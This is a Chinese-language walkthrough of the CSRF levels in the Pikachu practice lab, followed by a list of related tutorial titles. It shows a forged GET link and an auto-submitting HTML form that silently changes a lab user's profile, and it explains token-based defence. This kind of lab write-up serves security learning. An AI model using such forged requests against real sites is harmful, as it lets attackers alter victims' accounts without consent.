pikachu-CSRF通关教程
CSRF(跨站请求伪造)
概念:也被称为“One Click Attack”或者“Session Riding”,通过伪装来自受信任用户的请求来攻击受信任的网站。
CSRF(get)
关于这关的意义不是很明白,有懂的可以在下面评论区说一下。下面看过程吧。
根据他给的用户名和密码随便进一个,然后发现修改的信息并不会在URL里面显示,然后拿bp抓包,抓的是修改信息内。
发现他的可以修改信息,直接在里面修改完放行,他的个人信息就可以修改完了。
还可以就是把这段 /pikachu-master/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=18626545453&add=22&email=vince%40pikachu.com&submit=submit 复制下来加上http和主机地址补充完整,去访问这段网址,直接会跳到修改信息的界面。直接在连接里面改也可以。访问就是直接改完的。图就不放了。
CSRF(post)
发现URL不再显示参数,无法通过URL来伪造请求进行修改,但是本页面可以抓到可以修改的参数,可以通过bp直接修改。方法二:构造表单,这个我试了几次才成功,代码放下面了。
<!DOCTYPE html>
<html><head lang="en"><meta charset="utf-8"><title>csrf的post</title><script> <!-- 这个script是用来自动提交表单的-->window.onload = function() {document.getElementById("submit").click();}</script></head><body><form action="http://192.168.0.105/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php" method="post"><input type="text" name="sex" value="boy" /><input type="kobe" name="phonenum" value="18626545453" /><input type="kobe" name="add" value="9" /><input type="kobe" name="email" value="vince@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" /> </form></body>
</html>
CSRF Token
这关是防范CSRF的常用方法的一个演示。
token验证原理
CSRF的主要问题是敏感操作的链接容易被伪造
每次请求,都增加一个随机码(需要够随机,不容易伪造),后台每次对随机码进行验证
网页接受从后台发过来的token,类型不可见。将其一并提交给后台进行验证。每次刷新,后台发送过来的token都不一样,起到了防止伪造的作用。
pikachu-CSRF通关教程相关推荐
- pikachu通关教程通关详解超详细
pikachu通关教程佛系更新 暴力破解 跨站脚本XSS 反射型XSS(get): 反射型XSS(post): 存储型XSS: Dom型XSS(很鸡肋): xss之盲打: SQL注入 数字型: 字符型 ...
- pikachu通关教程
pikachu通关教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包. 直接找到一组账号和密码 验证码绕过(on server) 先进行 ...
- 攻防系列——pikachu靶场通关练习
目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...
- pikachu靶场通关
pikachu靶场通关详解 一.靶场介绍 二.靶场配置 三.靶场实战 3.1 暴力破解漏洞 3.1.1暴力破解攻击&暴力破解漏洞概述 3.1.2暴力破解漏洞测试流程 3.1.3基于表单的暴力破 ...
- Pikachu靶场通关记录(详细)
Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...
- Pikachu靶场通关笔记
目录 Burte Force(暴力破解) 基于表单的暴力破解 验证码绕过(on server) 验证码绕过(on client) token防暴破 Cross-Site Scripting (XSS) ...
- Cheat Engine游戏脚本修改器通关教程(脑残版Step9)
文章目录 Step 9 方法一 方法二 Step1 - Step8 通关教程地址(该教程写在2017年9月2日,现在疫情宅在家,补完后续教程):https://cylycgs.blog.csdn.ne ...
- 视频教程-信息系统项目管理师-通关教程4-软考
信息系统项目管理师-通关教程4 微信企业号星级会员.10多年软件从业经历,国家级软件项目负责人,主要从事软件研发.软件企业员工技能培训.已经取得计算机技术与软件资格考试(软考)--"信息系统 ...
- Upload-Labs靶场 1-21全通关教程
Upload-Labs通关 靶场介绍 安装 文件上传漏洞介绍 BurpSuite的简单使用 安装BurpSuite 配合Firefox使用 万能WebShell 正文开始 Pass-01 Pass-0 ...
- XSS Game通关教程
12.XSS Game通关教程 1.Ma Spaghet! 审查源码 一个不安全的方式,直接get传输somebody 输入123看看位置 ?somebody=123 如下 用下input标签即可 & ...
最新文章
- .gitmodule中没有为非子模块的路径找到子模块映射
- 区别聚焦索引和非聚集索引
- hybris安装执行install.sh -r b2c_acc initialize遇到build错误 8983端口
- 【labelme】改造labelme
- mysql性能结构优化原理_MySQL性能管理及架构设计(二):数据库结构优化、高可用架构设计、数据库索引优化...
- 鲸鱼优化算法_盘点 35 个 Java 代码优化细节
- 面试官 | Oracle JDK 和 OpenJDK 有什么区别?
- 剑指offer - 二维数组中的查找
- 报表类似选项卡的功能
- crm客户管理软件的精髓
- Flowplayer简单酷炫的视频播放器
- mysql order by file_深聊MySQL,从入门到入坟之:如何让order by、group by查询速度飞起来...
- 【报告分享】2021B站创作者生态报告-哔哩哔哩(附下载)
- Aggressive cows(c语言)
- LG G7解OP开Volte
- Makefile的最后一点问题也解决了
- 771. 宝石与石头
- android软件开发之webView.addJavascriptInterface循环渐进【二】
- 鲁大师5.12.15.1184 纯净去广告单文件版
- 计算机网络技术的发展模式背景,浅谈计算机网络技术发展模式
热门文章
- STM32 f407 3ADC 交替 实现 7.2Msps 采样率
- MS-DOS命令汇总
- 尚硅谷 周阳老师 SpringCloud 学习笔记
- 别在被ChatGPT的账号骗了
- Hutool 数字工具-NumberUtil使用(加减乘除,保留小数,格式化数字,是否为数字,随机数,整数列表,阶乘,平方根,最大公约数和最小公倍数,进制转换,比较大小,去除多余的0)
- 5G通信与物联网技术交流群
- Android 图片着色 Tint 详解2—xml设置、selector
- delph mysql结构体,Delphi中的结构体与类
- MATLAB的GUI小游戏—你话我猜
- 电信云平台NBIOT应用开发,使用C#测试